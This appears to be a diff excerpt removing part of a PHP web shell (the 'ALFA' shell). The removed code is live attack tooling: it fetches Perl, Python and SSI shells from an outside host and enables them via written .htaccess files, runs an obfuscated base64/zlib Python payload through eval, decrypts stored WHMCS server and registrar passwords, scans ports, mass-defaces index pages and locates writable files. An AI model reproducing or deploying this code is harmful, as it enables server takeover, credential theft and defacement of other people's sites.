- if ((@$_POST['alfa1'] == 'edit') && !empty($_POST['alfa2'])) {
- $data = explode(':', $_POST['alfa3']);
- echo ('<p><div class="txtfont">Table:</div> <font color="#0F0">' . $data[0] . '</font></p>');
- echo ("<form onsubmit='fsu(this);return false;'><table border='1'>");
- if ($data[1] != '0') {
- $data[2] = __ZGVjb2Rlcg($data[2]);
- $data[2] = str_replace('"', '', $data[2]);
- $fetch = $db->fetch($db->query('SELECT * FROM `' . $data[0] . '` WHERE `' . $data[1] . "` = '" . $data[2] . "'"));
- $fetch['__ALFAKEY'] = $data[1];
- $fetch['__ALFAKEYVAL'] = $data[2];
- } else {
- $d = __ZGVjb2Rlcg($data[2]);
- $fetch = json_decode($d, true);
- }
- foreach ($fetch as $key => $value) {
- if ($key == '__ALFAKEY' || $key == '__ALFAKEYVAL') continue;
- $value = htmlspecialchars($value);
- echo ("<tr><td>$key</td><td><input name='$key' value='$value' /></td></tr>");
- }
- echo ("</table><input type='hidden' name='__ALFADATA' value='" . __ZW5jb2Rlcg(json_encode(($data[1] != '0' ? array('__ALFAKEY' => $data[1], '__ALFAKEYVAL' => $data[2]) : $fetch))) . "'><input type='hidden' name='__ALFATBL' value='{$data[0]}'><input type='submit' value=' '></form>");
- }
- if ((@$_POST['alfa1'] == 'update') && !empty($_POST['alfa2'])) {
- $data = json_decode($_POST['alfa2'], true);
- $alfadata = $data['__ALFADATA'];
- $data2 = json_decode(__ZGVjb2Rlcg($alfadata), true);
- $keyval = array();
- echo ('<p><div class="txtfont">Table:</div> <font color="#0F0">' . $data['__ALFATBL'] . '</font></p>');
- echo ("<form onsubmit='fsu(this);return false;'><table border='1'>");
- $set = '';
- foreach ($data as $key => $value) {
- if ($key == '__ALFATBL' || $key == '__ALFADATA') continue;
- if ($data2['__ALFAKEY'] == $key) {
- $keyval['__ALFAKEY'] = $key;
- $keyval['__ALFAKEYVAL'] = $value;
- }
- $set.= "`$key` = '" . addslashes($value) . "',";
- $value = htmlspecialchars($value);
- echo ("<tr><td>$key</td><td><input name='$key' value='$value' /></td></tr>");
- }
- unset($data['__ALFADATA']);
- echo ("</table><input type='hidden' name='__ALFADATA' value='" . __ZW5jb2Rlcg(json_encode((isset($data2['__ALFAKEY']) ? array('__ALFAKEY' => $keyval['__ALFAKEY'], '__ALFAKEYVAL' => $keyval['__ALFAKEYVAL']) : $data))) . "'><input type='hidden' name='__ALFATBL' value='{$data['__ALFATBL']}'><input type='submit' value=' '></form>");
- if (!isset($data2['__ALFAKEY'])) {
- $where = '';
- foreach ($data2 as $key => $value) {
- if ($key == '__ALFATBL' || $key == '__ALFADATA') continue;
- $value = addslashes($value);
- $where.= "`$key` = '$value' AND ";
- }
- $where = substr($where, 0, -4);
- } else {
- $where = "`{$data2['__ALFAKEY']}` = '" . addslashes($data2['__ALFAKEYVAL']) . "'";
- }
- $set = substr($set, 0, -1);
- $db->fetch($db->query("UPDATE `{$data['__ALFATBL']}` SET $set WHERE $where"));
- if ($db->error()) echo '<div><b>Error:</b> ' . htmlspecialchars($db->error()) . '</div>';
- else echo ('Success...!');
- }
- if ($_POST['alfa1'] != 'edit' && $_POST['alfa1'] != 'update') {
- echo "<p>Query:</p><form onsubmit='fs(this);return false;'>
- <input type='hidden' name='alfa1' value='query'/>
- <textarea name='query' style='width:100%;height:100px'>";
- echo $_POST['alfa1'] != 'loadfile' ? htmlspecialchars($_POST['alfa2']) : '';
- echo "</textarea><p><center><input type=submit value=' '></center></p></form>";
- }
- echo '</td></tr>';
- }
- echo '</table></form><br/>';
- if ($_POST['type'] == 'mysql') {
- $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'");
- if ($db->fetch()) echo "<form onsubmit=\"fs('3',this.f.value);return false;\"><div class='txtfont'>Load file:</div> <input class='toolsInp' type='text' name='f'> <input type='submit' value=' '></form>";
- }
- if (@$_POST['alfa1'] == 'loadfile') {
- $file = $db->loadFile($_POST['alfa2']);
- echo '<pre class=ml1>' . htmlspecialchars($file['file']) . '</pre>';
- }
- } else {
- echo htmlspecialchars($db->error());
- }
- echo '</div>';
- alfafooter();
- }
- function getConfigHtml($cms) {
- $content = '';
- $cms_array = array('wp' => 'WordPress', 'vb' => 'vBulletin', 'whmcs' => 'Whmcs', 'joomla' => 'Joomla', 'phpnuke' => 'PHPNuke', 'phpbb' => 'PHPBB', 'mybb' => 'MyBB', 'drupal' => 'Drupal', 'smf' => 'SMF');
- $content.= "<form onSubmit='g(\"GetConfig\",null,this.cms.value,this.path.value);return false;'><div class='txtfont'>Cms: </div> <select name='cms'style='width:100px;'>";
- foreach ($cms_array as $key => $val) {
- $content.= "<option value='{$key}' " . ($key == $cms ? 'selected=selected' : '') . ">{$val}</option>";
- }
- $content.= "</select> <div class='txtfont'>Path(installed cms/Config): </div> <input type='text' name='path' value='" . $_SERVER['DOCUMENT_ROOT'] . "/' size='30' /> <button class='button'>GetConfig</button>";
- $content.= '</form>';
- return $content;
- }
- function alfacgishell() {
- alfahead();
- $div = '';
- if (!in_array($_POST['alfa1'], array('perl', 'py'))) {
- $div = '</div>';
- echo '<div class=header><center><p><div class="txtfont_header">| CGI Shell |</div></p><h3><a href=javascript:void(0) onclick="runcgi(\'perl\')">| Perl | </a><a href=javascript:void(0) onclick="runcgi(\'py\');">| Python | </a><a href=javascript:void(0) onclick="runcgi(\'ssi\');">| SSI Shell | </a><a href=javascript:void(0) onclick="runcgi(\'cgi1\');">| CGi Shell 1 (alfa1) | </a><a href=javascript:void(0) onclick="runcgi(\'cgi2\');">| CG Shell 2 (alfa2)| </a><a href=javascript:void(0) onclick="runcgi(\'hayben\');">| CGIHAYBEN| </a> ';
- }
- if ($_POST['alfa1'] == 'ssi') {
- @mkdir('mka7_shmtl', 0755);
- @chdir('mka7_shmtl');
- alfacgihtaccess('shtml');
- $code = file_get_contents('https://myofcl.github.io/mkaspyshell/ssishtml');
- @__write_file('mka7_ssi.shtml', __get_resource($code));
- @chmod('mka7_ssi.shtml', 0755);
- echo '<iframe src="mka7_shmtl/mka7_ssi.shtml" width="100%" height="600px" frameborder="0" style="opacity:0.9;filter: alpha(opacity=9);overflow:auto;"></iframe>';
- } elseif ($_POST['alfa1'] == 'hayben') {
- @mkdir('haybenk', 0755);
- @chdir('haybenk');
- alfacgihtaccess('hayben');
- $code = file_get_contents('https://myofcl.github.io/mkaspyshell/haypo');
- @__write_file('hay.po', $code);
- @chmod('hay.po', 0755);
- $code2 = file_get_contents('https://myofcl.github.io/mkaspyshell/hayben.txt');
- @__write_file('hayben', $code2);
- @chmod('hayben', 0755);
- echo '<iframe src="haybenk/hay.po" width="100%" height="600px" frameborder="0" style="opacity:0.9;filter: alpha(opacity=9);overflow:auto;"></iframe>';
- } elseif (isset($_POST['alfa1']) && in_array($_POST['alfa1'], array('perl', 'py', 'cgi1', 'cgi2'))) {
- @mkdir('cgimka7', 0755);
- @chdir('cgimka7');
- alfacgihtaccess('cgi');
- $name = $_POST['alfa1'] . '.mka';
- $perl2 = file_get_contents('https://myofcl.github.io/mkaspyshell/alfaperl');
- $py2 = '#!/usr/bin/python' . "
- import zlib, base64
- " . 'eval(compile(zlib.decompress(base64.b64decode("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")),\'<string>\',\'exec\'))';
- $perl = base64_decode(file_get_contents('https://myofcl.github.io/mkaspyshell/perlshell'));
- $py = base64_decode(file_get_contents('https://myofcl.github.io/mkaspyshell/pythonshell'));
- if ($_POST['alfa1'] == 'perl') {
- $code = $perl;
- } elseif ($_POST['alfa1'] == 'cgi1') {
- $name = 'perl2.mka';
- $code = $perl2;
- } elseif ($_POST['alfa1'] == 'cgi2') {
- $name = 'py2.mka';
- $code = $py2;
- } else {
- $name = 'error.log';
- $code = $py;
- }
- if (__write_file($name, $code)) {
- @chmod($name, 0755);
- echo '<iframe src="' . 'cgimka7/' . $name . '" width="100%" height="600px" frameborder="0" style="opacity:0.9;filter: alpha(opacity=9);overflow:auto;"></iframe>';
- }
- }
- echo $div;
- alfafooter();
- }
- function alfaWhmcs() {
- alfahead();
- echo '<div class=header>';
- function decrypt($string, $cc_encryption_hash) {
- $key = md5(md5($cc_encryption_hash)) . md5($cc_encryption_hash);
- $hash_key = _hash($key);
- $hash_length = strlen($hash_key);
- $string = __ZGVjb2Rlcg($string);
- $tmp_iv = substr($string, 0, $hash_length);
- $string = substr($string, $hash_length, strlen($string) - $hash_length);
- $iv = $out = '';
- $c = 0;
- while ($c < $hash_length) {
- $iv.= chr(ord($tmp_iv[$c]) ^ ord($hash_key[$c]));
- ++$c;
- }
- $key = $iv;
- $c = 0;
- while ($c < strlen($string)) {
- if (($c != 0 and $c % $hash_length == 0)) {
- $key = _hash($key . substr($out, $c - $hash_length, $hash_length));
- }
- $out.= chr(ord($key[$c % $hash_length]) ^ ord($string[$c]));
- ++$c;
- }
- return $out;
- }
- function _hash($string) {
- if (function_exists('sha1')) {
- $hash = sha1($string);
- } else {
- $hash = md5($string);
- }
- $out = '';
- $c = 0;
- while ($c < strlen($hash)) {
- $out.= chr(hexdec($hash[$c] . $hash[$c + 1]));
- $c+= 2;
- }
- return $out;
- }
- echo "<center><br><div class='txtfont_header'>| WHMCS DeCoder |</div><p>" . getConfigHtml('whmcs') . "</p><form onsubmit=\"g('Whmcs',null,this.form_action.value,'decoder',this.db_username.value,this.db_password.value,this.db_name.value,this.cc_encryption_hash.value,this.db_host.value); return false;\">
- <input type='hidden' name='form_action' value='2'>";
- $table = array('td1' => array('color' => 'FFFFFF', 'tdName' => 'db_host : ', 'inputName' => 'db_host', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'), 'td2' => array('color' => 'FFFFFF', 'tdName' => 'db_username : ', 'inputName' => 'db_username', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'), 'td3' => array('color' => 'FFFFFF', 'tdName' => 'db_password : ', 'inputName' => 'db_password', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'), 'td4' => array('color' => 'FFFFFF', 'tdName' => 'db_name : ', 'inputName' => 'db_name', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'), 'td5' => array('color' => 'FFFFFF', 'tdName' => 'cc_encryption_hash : ', 'inputName' => 'cc_encryption_hash', 'id' => 'cc_encryption_hash', 'inputValue' => '', 'inputSize' => '50'));
- create_table($table);
- echo "<p><input type='submit' value=' ' name='Submit'></p></form></center>";
- if ($_POST['alfa5'] != '') {
- $db_host = ($_POST['alfa7']);
- $db_username = ($_POST['alfa3']);
- $db_password = ($_POST['alfa4']);
- $db_name = ($_POST['alfa5']);
- $cc_encryption_hash = ($_POST['alfa6']);
- echo __pre();
- $conn = @mysqli_connect($db_host, $db_username, $db_password, $db_name) or die(mysqli_error($conn));
- $query = mysqli_query($conn, 'SELECT * FROM tblservers');
- $num = mysqli_num_rows($query);
- if ($num > 0) {
- for ($i = 0;$i <= $num - 1;$i++) {
- $v = @mysqli_fetch_array($query);
- $ipaddress = $v['ipaddress'];
- $username = $v['username'];
- $type = $v['type'];
- $active = $v['active'];
- $hostname = $v['hostname'];
- echo ("<center><table border='1'>");
- $password = decrypt($v['password'], $cc_encryption_hash);
- echo ("<tr><td><b><font color=\"#FFFFFF\">Type</font></td><td>$type</td></tr></b>");
- echo ("<tr><td><b><font color=\"#FFFFFF\">Active</font></td><td>$active</td></tr></b>");
- echo ("<tr><td><b><font color=\"#FFFFFF\">Hostname</font></td><td>$hostname</td></tr></b>");
- echo ("<tr><td><b><font color=\"#FFFFFF\">Ip</font></td><td>$ipaddress</td></tr></b>");
- echo ("<tr><td><b><font color=\"#FFFFFF\">Username</font></td><td>$username</td></tr></b>");
- echo ("<tr><td><b><font color=\"#FFFFFF\">Password</font></td><td>$password</td></tr></b>");
- echo '</table><br><br></center>';
- }
- $query1 = @mysqli_query($conn, 'SELECT * FROM tblregistrars');
- $num1 = @mysqli_num_rows($query1);
- if ($num1 > 0) {
- for ($i = 0;$i <= $num1 - 1;$i++) {
- $v = mysqli_fetch_array($query1);
- $registrar = $v['registrar'];
- $setting = $v['setting'];
- $value = decrypt($v['value'], $cc_encryption_hash);
- if ($value == '') {
- $value = 0;
- }
- echo ('<center>Domain Reseller <br><center>');
- echo ("<center><table border='1'>");
- echo ("<tr><td><b><font color=\"#67ABDF\">Register</font></td><td>$registrar</td></tr></b>");
- echo ("<tr><td><b><font color=\"#67ABDF\">Setting</font></td><td>$setting</td></tr></b>");
- echo ("<tr><td><b><font color=\"#67ABDF\">Value</font></td><td>$value</td></tr></b>");
- echo '</table><br><br></center>';
- }
- }
- } else {
- __alert('<font color="red">tblservers is Empty...!</font>');
- };
- }
- echo '</div>';
- alfafooter();
- }
- function alfaportscanner() {
- alfahead();
- echo '<div class=header><center><p><div class="txtfont_header">| Port Scaner |</div></p>
- <form action="" method="post" onsubmit="g(\'portscanner\',null,null,this.start.value,this.end.value,this.host.value); return false;">
- <input type="hidden" name="y" value="phptools">
- <div class="txtfont">Host: </div> <input id="text" type="text" name="host" value="localhost"/>
- <div class="txtfont">Port start: </div> <input id="text" size="5" type="text" name="start" value="80"/>
- <div class="txtfont">Port end: </div> <input id="text" size="5" type="text" name="end" value="80"/> <input type="submit" value=" " />
- </form></center><br>';
- $start = strip_tags($_POST['alfa2']);
- $end = strip_tags($_POST['alfa3']);
- $host = strip_tags($_POST['alfa4']);
- if (isset($_POST['alfa4']) && is_numeric($_POST['alfa3']) && is_numeric($_POST['alfa2'])) {
- echo __pre();
- $packetContent = "GET / HTTP/1.1
- ";
- if (ctype_xdigit($packetContent)) $packetContent = @pack('H*', $packetContent);
- else {
- $packetContent = str_replace(array("
- ", "
- "), '', $packetContent);
- $packetContent = str_replace(array("
- ", "
- "), array("
- ", "
- "), $packetContent);
- }
- for ($i = $start;$i <= $end;$i++) {
- $sock = @fsockopen($host, $i, $errno, $errstr, 3);
- if ($sock) {
- stream_set_timeout($sock, 5);
- fwrite($sock, $packetContent . "
- ");
- $counter = 0;
- $maxtry = 1;
- $bin = '';
- do {
- $line = fgets($sock, 1024);
- if (trim($line) == '') $counter++;
- $bin.= $line;
- }
- while ($counter < $maxtry);
- fclose($sock);
- echo "<center><p>Port <font style='color:#DE3E3E'>$i</font> is open</p>";
- echo "<p><textarea style='height:140px;width:50%;'>" . $bin . '</textarea></p></center>';
- }
- flush();
- }
- }
- echo '</div>';
- alfafooter();
- }
- function alfacgihtaccess($m, $d = '', $symname = false) {
- $readme = '';
- if ($symname) {
- $readme = "
- ReadmeName " . trim($symname);
- }
- if ($m == 'cgi') {
- $code = "#Coded By hayben & MKA7
- Options FollowSymLinks MultiViews Indexes ExecCGI
- AddType application/x-httpd-cgi .mka
- AddHandler cgi-script .mka
- RewriteEngine on
- RewriteRule (.*)\war$ .log
- ## END ##";
- } elseif ($m == 'sym') {
- $code = "#Coded By hayben & MKA7
- Options Indexes FollowSymLinks
- DirectoryIndex mka7.phtm
- AddType text/plain php html php4 phtml
- AddHandler text/plain php html php4 phtml{$readme}
- Options all";
- } elseif ($m == 'shtml') {
- $code = "Options +Includes
- AddType text/html .shtml
- AddHandler server-parsed .shtml";
- } elseif ($m == 'hayben') {
- $code = 'Options FollowSymLinks MultiViews Indexes ExecCGI
- AddType application/x-httpd-cgi .txt
- AddHandler cgi-script .pl
- AddHandler cgi-script .po';
- }
- @__write_file($d . '.htaccess', $code);
- }
- function alfaziper() {
- alfahead();
- echo '<div class=header><p><center><p><div class="txtfont_header">| Sktrc |</div></p>
- <form onSubmit="g(\'ziper\',null,null,null,this.dirzip.value,this.zipfile.value,\'>>\');return false;" method="post">
- <div class="txtfont">Dir/File: </div> <input type="text" name="dirzip" value="' . htmlspecialchars($GLOBALS['cwd']) . '" size="60"/>
- <div class="txtfont">Save Dir: </div> <input type="text" name="zipfile" value="' . $GLOBALS['cwd'] . 'mka7.zip" size="60"/>
- <input type="submit" value=" " name="ziper" />
- </form></center></p>';
- if (isset($_POST['alfa5']) && ($_POST['alfa5'] == '>>')) {
- $dirzip = $_POST['alfa3'];
- $zipfile = $_POST['alfa4'];
- if (class_exists('ZipArchive') && ($GLOBALS['sys'] != 'unix' || !_alfa_can_runCommand(true, true))) {
- $code = 'if(!extension_loaded(\'zip\')||!file_exists($source)){return false;}$zip=new ZipArchive();if(!$zip->open($destination,ZIPARCHIVE::CREATE)){return false;}$source=str_replace(\'\\', \'/\',realpath($source));if(is_dir($source)===true){$files=new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source),RecursiveIteratorIterator::SELF_FIRST);foreach($files as $file){$file=str_replace(\'\\', \'/\',$file);if(in_array(substr($file,strrpos($file,\'/\')+1),array(\'.\',\'..\')))continue;$file=realpath($file);if(is_dir($file)===true){$zip->addEmptyDir(str_replace($source.\'/\',\'\',$file.\'/\'));}else if(is_file($file)===true){$zip->addFromString(str_replace($source.\'/\',\'\',$file),file_get_contents($file));}}}else if(is_file($source)===true){$zip->addFromString(basename($source),file_get_contents($source));}return $zip->close();';
- $newfunc = create_function('$source,$destination', $code);
- if ($newfunc($dirzip, $zipfile)) {
- echo __pre() . '<center><p><font color="green">Success...!<br>' . $zipfile . '</font></p></center>';
- } else {
- echo __pre() . '<center><p><font color="red">ERROR!!!...</font></p></center>';
- }
- } else {
- alfaEx("cd '" . addslashes(dirname($zipfile)) . "';zip -r '" . addslashes(basename($zipfile)) . "' '" . addslashes($dirzip) . "' > /dev/null &");
- echo __pre() . '<center><p>1 dakika sonra u dizine parmak at kanka -> <b><font color="green">' . $zipfile . '</font></b><br>ben arka planda zipliyorum </p></center>';
- }
- }
- echo '</div>';
- alfafooter();
- }
- function Alfa_StrSearcher($dir, $string, $ext, $e, $arr = array()) {
- if (@is_dir($dir)) {
- $files = @scandir($dir);
- foreach ($files as $key => $value) {
- $path = @realpath($dir . DIRECTORY_SEPARATOR . $value);
- if (!@is_dir($path)) {
- if ($ext != '*') {
- $f = basename($path);
- $f = explode('.', $f);
- $f = end($f);
- if ($f != $ext) continue;
- }
- if ($e == 'str') {
- $content = @file_get_contents($path);
- if (strpos($content, $string) !== false) {
- echo str_replace('\',' / ',$path) .' < br > ';
- }
- }
- else
- {
- if (strstr($value,$string))
- {
- echo str_replace('\',' / ',$path) .' < br > ';
- }
- }
- $results[] = $path;
- }
- elseif ($value != ' . '&&$value != ' . . ')
- {
- Alfa_StrSearcher($path,$string,$ext,$e,$results);
- $results[] = $path;
- }
- }
- }
- }
- function Alfa_ReadDir($dir,$method = '',$defpage = '')
- {
- if (!@is_readable($dir)) return false;
- if (@is_dir($dir))
- {
- if ($dh = @opendir($dir))
- {
- while (($file = readdir($dh)) !== false)
- {
- if ($file == ' . . '||$file == ' . ') continue;
- $newfile = $dir .' / '.$file;
- if (@is_readable($newfile) &&@is_dir($newfile)) Alfa_ReadDir($newfile,$method,$defpage);
- if (@is_file($newfile))
- {
- if (!@is_readable($newfile)) continue;
- Alfa_Rewriter($newfile,$file,$defpage,$method);
- }
- }
- closedir($dh);
- }
- }
- }
- function Alfa_Rewriter($dir,$file,$defpage,$m = 'index')
- {
- if (!@is_writable($dir)) return false;
- if (!@is_readable($dir)) return false;
- $defpage = @file_get_contents($defpage);
- if ($m == 'index')
- {
- $indexs = array(
- 'index . php',
- 'index . htm',
- 'index . html',
- '
- default . asp',
- '
- default . aspx',
- 'index . asp',
- 'index . aspx',
- 'index . js'
- );
- if (in_array(strtolower($file) ,$indexs))
- {
- @file_put_contents($dir,$defpage);
- echo @is_file($dir) ?$dir ."<b><font color='red'>DeFaced...</b></font><br>": '';
- }
- }
- elseif ($m == 'all')
- {
- @file_put_contents($dir,$defpage);
- echo @is_file($dir) ?$dir ." <b><font color='red'>DeFaced...</b></font><br>": '';
- }
- }
- function alfaGetDisFunc()
- {
- alfahead();
- echo ' < divclass = "header" > ';
- $disfun = @ini_get('disable_functions');
- $s = explode(', ',$disfun);
- $f = array_unique($s);
- echo ' < center > < br > < b > < fontcolor = "#7CFC00" > DisableFunctions < / font > < / b > < pre > < tableborder = "1" > < tr > < tdalign = "center"style = "background-color: green;color: white;width:5%" > #</td><td align="center" style="background-color: green;color: white;">Func Name</td></tr>';
- $i = 1;
- foreach ($f as $s) {
- $s = trim($s);
- if (function_exists($s) || !is_callable($s)) continue;
- echo '<tr><td align="center" style="background-color: black;">' . $i . '</td>';
- echo '<td align="center" style="background-color: black;"><a style="text-decoration: none;" target="_blank" href="http://php.net/manual/en/function.' . str_replace('_', '-', $s) . '.php"><span class="disable_functions"><b>' . $s . '</b></span></a></td>';
- $i++;
- }
- echo '</table></center>';
- echo '</div>';
- alfafooter();
- }
- function Alfa_Create_A_Tag($action, $vals) {
- $nulls = array();
- foreach ($vals as $key => $val) {
- echo '<a href=javascript:void(0) onclick="g(\'' . $action . '\',';
- for ($i = 1;$i <= $val[1] - 1;$i++) $nulls[] = 'null';
- $f = implode(',', $nulls);
- echo $f . ',\'' . $val[0] . '\');return false;">| ' . $key . ' | </a>';
- unset($nulls);
- }
- }
- function Alfa_Searcher($dir, $ext, $method) {
- if (@is_readable($dir)) {
- if ($method == 'all') $ext = '*';
- if ($method == 'dirs') $ext = '*';
- $globFiles = @glob("$dir/*.$ext");
- $globDirs = @glob("$dir/*", GLOB_ONLYDIR);
- $blacklist = array();
- foreach ($globDirs as $dir) {
- if (!@is_readable($dir)) continue;
- @Alfa_Searcher($dir, $ext, $method);
- }
- switch ($method) {
- case 'files':
- foreach ($globFiles as $file) {
- if (@is_writable($file)) {
- echo "$file<br>";
- }
- }
- break;
- case 'dirs':
- foreach ($globFiles as $file) {
- if (@is_writable(dirname($file)) && !in_array(dirname($file), $blacklist)) {
- echo dirname($file) . '<br>';
- $blacklist[] = dirname($file);
- }
- }
- break;
- case 'all':
- foreach ($globFiles as $file) {
- echo $file . '<br>';
- }
- break;
- }
- unset($blacklist);
- }
- }
- function AlfaiFrameCreator($f, $width = '100%', $height = '600px') {
- return ('<iframe src="' . $f . '" width="' . $width . '" height="' . $height . '" frameborder="0"></iframe>');
- }
- class AlfaCURL {
- public $headers;
- public $user_agent;
- public $compression;
- public $cookie_file;
- public $proxy;
- public $path;
- public $ssl = false;
- public $curl_status = true;
- function __construct($cookies = false, $compression = 'gzip', $proxy = '') {
- if (!extension_loaded('curl')) {
- $curl_status = false;
- return false;
- }
- $this->headers[] = 'Accept: image/gif, image/x-bitmap, image/jpeg, image/pjpeg';
- $this->headers[] = 'Connection: Keep-Alive';
- $this->headers[] = 'Content-type: application/x-www-form-urlencoded;charset=UTF-8';
- $this->headers[] = 'Cookie: mail=mka7%40pay-mon.com';
- $this->user_agent = 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)';
- $this->path = ALFA_TEMPDIR . '/Mka7_cookies.txt';
- $this->compression = $compression;
- $this->proxy = $proxy;
- $this->cookies = $cookies;
- if ($this->cookies) $this->cookie($this->path);
- }
- function cookie($cookie_file) {
- if (_alfa_file_exists($cookie_file, false)) {
- $this->cookie_file = $cookie_file;
- } else {
- @fopen($cookie_file, 'w') or die($this->error('The cookie file could not be opened.'));
- $this->cookie_file = $cookie_file;
- @fclose($this->cookie_file);
- }
- }
- function Send($url, $method = 'get', $data = '') {
- if (!$this->curl_status) {
- return false;
- }
- $process = curl_init($url);
- curl_setopt($process, CURLOPT_HTTPHEADER, $this->headers);
- curl_setopt($process, CURLOPT_HEADER, 0);
- curl_setopt($process, CURLOPT_USERAGENT, $this->user_agent);
- curl_setopt($process, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($process, CURLOPT_ENCODING, $this->compression);
- curl_setopt($process, CURLOPT_TIMEOUT, 30);
- if ($this->ssl) {
- curl_setopt($process, CURLOPT_SSL_VERIFYPEER, false);
- curl_setopt($process, CURLOPT_SSL_VERIFYHOST, false);
- }
- if ($this->cookies) {
- curl_setopt($process, CURLOPT_COOKIEFILE, $this->path);
- curl_setopt($process, CURLOPT_COOKIEJAR, $this->path);
- }
- if ($this->proxy) {
- curl_setopt($process, CURLOPT_PROXY, $this->proxy);
- }
- if ($method == 'post') {
- curl_setopt($process, CURLOPT_POSTFIELDS, $data);
- curl_setopt($process, CURLOPT_POST, 1);
- curl_setopt($process, CURLOPT_HTTPHEADER, array('Content-Type: application/x-www-form-urlencoded'));
- }
- $return = curl_exec($process);
- curl_close($process);
- return $return;
- }
- function error($error) {
- echo "<center><div style='width:500px;border: 3px solid #FFEEFF; padding: 3px; background-color: #FFDDFF;font-family: verdana; font-size: 10px'><b>cURL Error</b><br>$error</div></center>";
- die;
- }
- }
